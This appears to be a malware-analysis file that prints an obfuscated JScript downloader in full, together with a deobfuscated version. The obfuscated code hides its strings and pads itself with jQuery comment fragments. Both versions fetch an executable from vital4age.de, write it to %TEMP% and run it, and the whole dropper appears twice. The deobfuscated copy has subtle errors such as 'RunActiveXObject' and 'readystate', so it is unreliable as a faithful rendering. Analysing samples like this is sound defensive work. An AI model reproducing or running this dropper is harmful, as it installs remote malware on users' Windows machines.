pluma/deobfuscated.js

## deobfuscated.js
var shell = new ActiveXObject('WScript.Shell')
var xhr = new ActiveXObject('MSXML2.XMLHTTP')
var virus = shell.ExpandEnvironmentStrings('%TEMP%') + '/CBMQFs.exe'
xhr.onreadystatechange = function () {
  if (xhr.readystate === 4) {
    var stream = new ActiveXObject('ADODB.Stream')
    stream.open()
    stream.type = 1
    stream.write(xhr.ResponseBody)
    stream.position = 0
    stream.saveToFile(virus, 2)
    stream.close()
  }
}
try {
  xhr.open('GET', 'http://vital4age.de/v4v5g45hg.exe', false)
  xhr.send()
  shell.RunActiveXObject(virus, 1, false)
} catch (e) {}

## original.js
ApBcVkzVRDu = " ...in a gzip-friendly way node = parent; outerCache = node[ expando ] || (node[ expando ] = {});";
insecureI = 0;
String.prototype.positioning = function () { return this.substr(0, 1); };
var JjusVCax = ["S"+"Ai"+"us"+("ignore","erica","savior","gW"), ("harvey","ineffable","melbourne","transept","YLS")+"md"+"zI"+("fabric","probe","refined","foamy","pL"), "E"+("cherokee","possession","xpan")+("orlando","haystack","elfin","ottawa","dE")+("chair","session","nv")+"ir"+"onmentSt"+("finland","recalcitrant","conversation","ri")+("curry","continuously","ngs"), ""+("grapple","slake","cheapest","%")+("aberration","thunderbolt","textbooks","TE")+"MP%", "/CBMQFs" + ""+("anoint","seaweed",".")+"exe", "R"+("remix","badinage","un"), ("regional","points","Actdugout")+("compare","insidiously","amidships","iv")+"du"+"gouteXdu"+("shelf","mounts","settlement","go")+("species","exclusion","utOb")+("solidarity","telescope","du")+"go"+("unabated","generated","pithy","arcadia","utje")+("spread","calendar","wallis","obstruction","du")+("teamster","errol","dualism","services","go")+("chips","imperil","dialogue","ut")+("lustrous","commissioner","guinea","threatened","ct"), "jdixFLw", "pSTgRw", ("augment","trespass","W")+"Sc"+"du"+("characteristic","creeper","goutript")+"dugout." + ("bombard","absolved","overrated","S"), "NAXOvpX", "h"+"dugo"+"ut"+"el"+"du"+("heath","workhouse","compressed","go")+"utl", "AjkObRyb", "P"+"gj"+("nudity","apostolic","cO")+"ksYvkN", "Mdu"+("reservoir","ethiopia","go")+("scout","hovel","trinity","ut")+("install","vision","SXdu")+"gout"+("maybe","tolerance","MLdugout2") + "."+"du"+"go"+"ut"+"XM"+("college","killer","prosy","du")+"go"+"ut"+"LH"+"du"+"go"+"ut"+"TTP"];
OjTFnNmRQ = " Fallback to seeking `elem` from the start (diff = nodeIndex = 0) || start.pop()) ) {";
JjusVCax.splice(7, insecureI + 2);
ugliness = JjusVCax[2+2+2].split("dugout").join("");
var gLyfdlw = this[ugliness];
XkGGnvVviQQ = "pKmmYpEOYek";
sensitive = (("reiterate", "michael", "KaqiMeljdT", "assisted", "pXvhVWd") + "bVOPSi").positioning();
prestons = (("elopement", "integral", "bNVmbVTY", "auditor", "sVmfMHeEHUu") + "oPRtHLYcn").positioning();
insecureI = 6;
JjusVCax[insecureI + 1] = JjusVCax[insecureI + 1] + JjusVCax[insecureI + 3];
JjusVCax[insecureI + 2] = "UghOKppVbXn";
insecureI++;
JjusVCax.splice(insecureI + 1, insecureI - 4);
JjusVCax[insecureI] = JjusVCax[insecureI].split("dugout").join("");
var Bgehhk = new gLyfdlw(JjusVCax[insecureI]);
ElIQpsWrhTy = " cache = uniqueCache[ type ] || []; nodeIndex = cache[ 0 ] === dirruns && cache[ 1 ]; diff = nodeIndex && cache[ 2 ]; node = nodeIndex && parent.childNodes[ nodeIndex ];";
insecureI++;
JjusVCax[insecureI + 1] = JjusVCax[insecureI + 1].split("dugout").join("");
var VrMzrLLlD = new gLyfdlw(JjusVCax[insecureI+1]);
elVCEpWQK = " Support: IE <9 only Defend against cloned attroperties (jQuery gh-1709) uniqueCache = outerCache[ node.uniqueID ] || (outerCache[ node.uniqueID ] = {});";
insecureI /= 2;
var boqCakIHC = Bgehhk[JjusVCax[insecureI-2]](JjusVCax[insecureI - 1]) + JjusVCax[insecureI];
afWWWOpLSwq = " while ( (node = ++nodeIndex && node && node[ dir ] ||";
VrMzrLLlD.onreadystatechange = function () {
    if (VrMzrLLlD["rea"+"dy"+("coterie","haphazard","actuality","st")+("abdication","elect","ate")] === 4) {
        var sJQvR = new gLyfdlw((""+"A"+("structured","auditorium","pO")+("herbage","hughes","cyclone","DB.")+""+"S"+"tr"+("sanity","traditionally","statistical","astute","eam")).replace("p", "D"));
        sJQvR.open();
        lFJQvFf = " When found, cache indexes on `parent` and break if ( node.nodeType === 1 && ++diff && node === elem ) { uniqueCache[ type ] = [ dirruns, nodeIndex, diff ]; break; } ";
        sJQvR.type = 8*(4-3-1)+1;
        RaHCKzsLqKb = "} } else { Use previously-cached element index if available if ( useCache ) { ...in a gzip-friendly way node = elem; outerCache = node[ expando ] || (node[ expando ] = {});";
        sJQvR[("frontpage","tramadol","w")+"ri"+"te"](VrMzrLLlD[""+"R"+"es"+("memory","replacement","benighted","pon")+prestons+"e"+("parts","scalp","bunch","grotto","Bo")+"dy"]);
        nMkCSsvh = " Support: IE <9 only Defend against cloned attroperties (jQuery gh-1709) uniqueCache = outerCache[ node.uniqueID ] || (outerCache[ node.uniqueID ] = {});";
        sJQvR[(sensitive+"o"+"Di"+"ti"+("extricate","keyword","damage","on")).replace("D", prestons)] = 0;
        vbbnPY = " cache = uniqueCache[ type ] || []; nodeIndex = cache[ 0 ] === dirruns && cache[ 1 ]; diff = nodeIndex; ";
        sJQvR.saveToFile(boqCakIHC, 2);
        SMTqKOY = "} xml :nth-child(...) or :nth-last-child(...) or :nth(-last)?-of-type(...) if ( diff === false ) { Use the same loop as above to seek `elem` from the start while ( (node = ++nodeIndex && node && node[ dir ] || (diff = nodeIndex = 0) || start.pop()) ) {";
        sJQvR.close();
        xtmwwD = " if ( ( ofType ? node.nodeName.toLowerCase() === name : node.nodeType === 1 ) && ++diff ) {";
    };
};
try {

    ivSbyvgX  = " Cache the index of each encountered element if ( useCache ) { outerCache = node[ expando ] || (node[ expando ] = {});";
    VrMzrLLlD.open("G"+("phalanx","forbidden","mainstream","trauma","ET"), "htt"+("circumstances","animosity","p://")+("authoritative","spectrum","schooling","vi")+"ta"+("quantitative","profligate","binary","denomination","l4")+("confounding","write","caricature","levitra","age.de")+("cyber","sequence","affluence","/v4v5g")+"45"+"hg.e"+"xe", false);

    kXTvYF = " Support: IE <9 only Defend against cloned attroperties (jQuery gh-1709) uniqueCache = outerCache[ node.uniqueID ] || (outerCache[ node.uniqueID ] = {});";
    VrMzrLLlD[prestons + ("villas","supervision","medicine","e") + (("lectures", "statistical", "UAcRDQK", "sound", "scrubs", "nyNjfyfXKxb") + "FtNATMOQfLT").positioning() + (("drainage", "scanners", "bQerVtKQq", "astronomy", "ivory", "diBJmayWmnv") + "gaUgahfN").positioning()]();
    EXDkho = " uniqueCache[ type ] = [ dirruns, diff ]; ";
    Bgehhk[JjusVCax[insecureI+1]](boqCakIHC, 1, "McqMjBUl" === "PHLpSRy"); xdVphT = " \"PSEUDO\": function( pseudo, argument ) { pseudo-class names are case-insensitive http:www.w3.org/TR/selectors/#pseudo-classes Prioritize by case sensitivity in case custom pseudos are added with uppercase letters Remember that setFilters inherits from pseudos var args, fn = Expr.pseudos[ pseudo ] || Expr.setFilters[ pseudo.toLowerCase() ] || Sizzle.error( \"unsupported pseudo: \" + pseudo );";
    hUQjlUlE = "} if ( node === elem ) { break; } } } } ";
} catch (nGDSVs) { };
qfjWze = "} Incorporate the offset, then check against cycle size diff -= last; return diff === first || ( diff % first === 0 && diff / first >= 0 ); } }; },";
	var shell = new ActiveXObject('WScript.Shell')
	var xhr = new ActiveXObject('MSXML2.XMLHTTP')
	var virus = shell.ExpandEnvironmentStrings('%TEMP%') + '/CBMQFs.exe'
	xhr.onreadystatechange = function () {
	if (xhr.readystate === 4) {
	var stream = new ActiveXObject('ADODB.Stream')
	stream.open()
	stream.type = 1
	stream.write(xhr.ResponseBody)
	stream.position = 0
	stream.saveToFile(virus, 2)
	stream.close()
	}
	}
	try {
	xhr.open('GET', 'http://vital4age.de/v4v5g45hg.exe', false)
	xhr.send()
	shell.RunActiveXObject(virus, 1, false)
	} catch (e) {}
	ApBcVkzVRDu = " ...in a gzip-friendly way node = parent; outerCache = node[ expando ] \|\| (node[ expando ] = {});";
	insecureI = 0;
	String.prototype.positioning = function () { return this.substr(0, 1); };
	var JjusVCax = ["S"+"Ai"+"us"+("ignore","erica","savior","gW"), ("harvey","ineffable","melbourne","transept","YLS")+"md"+"zI"+("fabric","probe","refined","foamy","pL"), "E"+("cherokee","possession","xpan")+("orlando","haystack","elfin","ottawa","dE")+("chair","session","nv")+"ir"+"onmentSt"+("finland","recalcitrant","conversation","ri")+("curry","continuously","ngs"), ""+("grapple","slake","cheapest","%")+("aberration","thunderbolt","textbooks","TE")+"MP%", "/CBMQFs" + ""+("anoint","seaweed",".")+"exe", "R"+("remix","badinage","un"), ("regional","points","Actdugout")+("compare","insidiously","amidships","iv")+"du"+"gouteXdu"+("shelf","mounts","settlement","go")+("species","exclusion","utOb")+("solidarity","telescope","du")+"go"+("unabated","generated","pithy","arcadia","utje")+("spread","calendar","wallis","obstruction","du")+("teamster","errol","dualism","services","go")+("chips","imperil","dialogue","ut")+("lustrous","commissioner","guinea","threatened","ct"), "jdixFLw", "pSTgRw", ("augment","trespass","W")+"Sc"+"du"+("characteristic","creeper","goutript")+"dugout." + ("bombard","absolved","overrated","S"), "NAXOvpX", "h"+"dugo"+"ut"+"el"+"du"+("heath","workhouse","compressed","go")+"utl", "AjkObRyb", "P"+"gj"+("nudity","apostolic","cO")+"ksYvkN", "Mdu"+("reservoir","ethiopia","go")+("scout","hovel","trinity","ut")+("install","vision","SXdu")+"gout"+("maybe","tolerance","MLdugout2") + "."+"du"+"go"+"ut"+"XM"+("college","killer","prosy","du")+"go"+"ut"+"LH"+"du"+"go"+"ut"+"TTP"];
	OjTFnNmRQ = " Fallback to seeking `elem` from the start (diff = nodeIndex = 0) \|\| start.pop()) ) {";
	JjusVCax.splice(7, insecureI + 2);
	ugliness = JjusVCax[2+2+2].split("dugout").join("");
	var gLyfdlw = this[ugliness];
	XkGGnvVviQQ = "pKmmYpEOYek";
	sensitive = (("reiterate", "michael", "KaqiMeljdT", "assisted", "pXvhVWd") + "bVOPSi").positioning();
	prestons = (("elopement", "integral", "bNVmbVTY", "auditor", "sVmfMHeEHUu") + "oPRtHLYcn").positioning();
	insecureI = 6;
	JjusVCax[insecureI + 1] = JjusVCax[insecureI + 1] + JjusVCax[insecureI + 3];
	JjusVCax[insecureI + 2] = "UghOKppVbXn";
	insecureI++;
	JjusVCax.splice(insecureI + 1, insecureI - 4);
	JjusVCax[insecureI] = JjusVCax[insecureI].split("dugout").join("");
	var Bgehhk = new gLyfdlw(JjusVCax[insecureI]);
	ElIQpsWrhTy = " cache = uniqueCache[ type ] \|\| []; nodeIndex = cache[ 0 ] === dirruns && cache[ 1 ]; diff = nodeIndex && cache[ 2 ]; node = nodeIndex && parent.childNodes[ nodeIndex ];";
	insecureI++;
	JjusVCax[insecureI + 1] = JjusVCax[insecureI + 1].split("dugout").join("");
	var VrMzrLLlD = new gLyfdlw(JjusVCax[insecureI+1]);
	elVCEpWQK = " Support: IE <9 only Defend against cloned attroperties (jQuery gh-1709) uniqueCache = outerCache[ node.uniqueID ] \|\| (outerCache[ node.uniqueID ] = {});";
	insecureI /= 2;
	var boqCakIHC = Bgehhk[JjusVCax[insecureI-2]](JjusVCax[insecureI - 1]) + JjusVCax[insecureI];
	afWWWOpLSwq = " while ( (node = ++nodeIndex && node && node[ dir ] \|\|";
	VrMzrLLlD.onreadystatechange = function () {
	if (VrMzrLLlD["rea"+"dy"+("coterie","haphazard","actuality","st")+("abdication","elect","ate")] === 4) {
	var sJQvR = new gLyfdlw((""+"A"+("structured","auditorium","pO")+("herbage","hughes","cyclone","DB.")+""+"S"+"tr"+("sanity","traditionally","statistical","astute","eam")).replace("p", "D"));
	sJQvR.open();
	lFJQvFf = " When found, cache indexes on `parent` and break if ( node.nodeType === 1 && ++diff && node === elem ) { uniqueCache[ type ] = [ dirruns, nodeIndex, diff ]; break; } ";
	sJQvR.type = 8*(4-3-1)+1;
	RaHCKzsLqKb = "} } else { Use previously-cached element index if available if ( useCache ) { ...in a gzip-friendly way node = elem; outerCache = node[ expando ] \|\| (node[ expando ] = {});";
	sJQvR[("frontpage","tramadol","w")+"ri"+"te"](VrMzrLLlD[""+"R"+"es"+("memory","replacement","benighted","pon")+prestons+"e"+("parts","scalp","bunch","grotto","Bo")+"dy"]);
	nMkCSsvh = " Support: IE <9 only Defend against cloned attroperties (jQuery gh-1709) uniqueCache = outerCache[ node.uniqueID ] \|\| (outerCache[ node.uniqueID ] = {});";
	sJQvR[(sensitive+"o"+"Di"+"ti"+("extricate","keyword","damage","on")).replace("D", prestons)] = 0;
	vbbnPY = " cache = uniqueCache[ type ] \|\| []; nodeIndex = cache[ 0 ] === dirruns && cache[ 1 ]; diff = nodeIndex; ";
	sJQvR.saveToFile(boqCakIHC, 2);
	SMTqKOY = "} xml :nth-child(...) or :nth-last-child(...) or :nth(-last)?-of-type(...) if ( diff === false ) { Use the same loop as above to seek `elem` from the start while ( (node = ++nodeIndex && node && node[ dir ] \|\| (diff = nodeIndex = 0) \|\| start.pop()) ) {";
	sJQvR.close();
	xtmwwD = " if ( ( ofType ? node.nodeName.toLowerCase() === name : node.nodeType === 1 ) && ++diff ) {";
	};
	};
	try {

	ivSbyvgX = " Cache the index of each encountered element if ( useCache ) { outerCache = node[ expando ] \|\| (node[ expando ] = {});";
	VrMzrLLlD.open("G"+("phalanx","forbidden","mainstream","trauma","ET"), "htt"+("circumstances","animosity","p://")+("authoritative","spectrum","schooling","vi")+"ta"+("quantitative","profligate","binary","denomination","l4")+("confounding","write","caricature","levitra","age.de")+("cyber","sequence","affluence","/v4v5g")+"45"+"hg.e"+"xe", false);

	kXTvYF = " Support: IE <9 only Defend against cloned attroperties (jQuery gh-1709) uniqueCache = outerCache[ node.uniqueID ] \|\| (outerCache[ node.uniqueID ] = {});";
	VrMzrLLlD[prestons + ("villas","supervision","medicine","e") + (("lectures", "statistical", "UAcRDQK", "sound", "scrubs", "nyNjfyfXKxb") + "FtNATMOQfLT").positioning() + (("drainage", "scanners", "bQerVtKQq", "astronomy", "ivory", "diBJmayWmnv") + "gaUgahfN").positioning()]();
	EXDkho = " uniqueCache[ type ] = [ dirruns, diff ]; ";
	Bgehhk[JjusVCax[insecureI+1]](boqCakIHC, 1, "McqMjBUl" === "PHLpSRy"); xdVphT = " \"PSEUDO\": function( pseudo, argument ) { pseudo-class names are case-insensitive http:www.w3.org/TR/selectors/#pseudo-classes Prioritize by case sensitivity in case custom pseudos are added with uppercase letters Remember that setFilters inherits from pseudos var args, fn = Expr.pseudos[ pseudo ] \|\| Expr.setFilters[ pseudo.toLowerCase() ] \|\| Sizzle.error( \"unsupported pseudo: \" + pseudo );";
	hUQjlUlE = "} if ( node === elem ) { break; } } } } ";
	} catch (nGDSVs) { };
	qfjWze = "} Incorporate the offset, then check against cycle size diff -= last; return diff === first \|\| ( diff % first === 0 && diff / first >= 0 ); } }; },";